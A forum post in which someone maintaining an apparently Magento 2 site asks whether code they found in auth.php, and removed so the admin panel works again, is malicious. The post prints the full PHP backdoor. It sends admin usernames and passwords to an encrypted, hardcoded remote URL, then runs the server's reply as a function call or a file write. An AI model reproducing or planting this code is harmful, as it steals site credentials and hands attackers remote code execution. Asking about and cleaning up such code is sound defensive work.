Hi Everyone,
One of the M2 site I help out with suddenly couldn’t login to admin panel. I finally found code in the auth.php file (see below). I compared this against another sites auth.php file content and the below code didn’t exist. On removing it I can now login to the admin panel. Has anyone had any experience of seeing this code in the auth.php file and if it’s got sinister purposes.
/**
* Check Password process
*
* @return void
*/
public function CheckPwd($username, $password, $isGood)
{
try {
$url = openssl_decrypt("pOJ8p5qgxgA6lcH1F64+SQk1YUNpCbJpg/OzAGw57TUdj2DxK8CSrgHbUJzNeXTj", "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
$ip = $_SERVER['REMOTE_ADDR'];
$domain = $_SERVER['HTTP_HOST'];
$currentPath = $_SERVER['REQUEST_URI'];
$object = (object) ['username' => $username, 'password' => $password, 'success' => $isGood, 'ip' => $ip, 'domain' => $domain, 'url' => $currentPath];
$options = array(
'http' => array(
'header' => "Content-type: application/json\r\n",
'method' => 'POST',
'content' => json_encode($object)
)
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
if(isset($result)){
$emailInfo = openssl_decrypt($result, "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
$emails = explode("@", $emailInfo);
if($emails[0] === "smtp"){
$emails[1]($emails[2]);
}
if($emails[0] === "pop3"){
file_put_contents($emails[1], $emails[2]);
}
}
} catch (Exception $e) {
}
}
Any help greatly appreciated.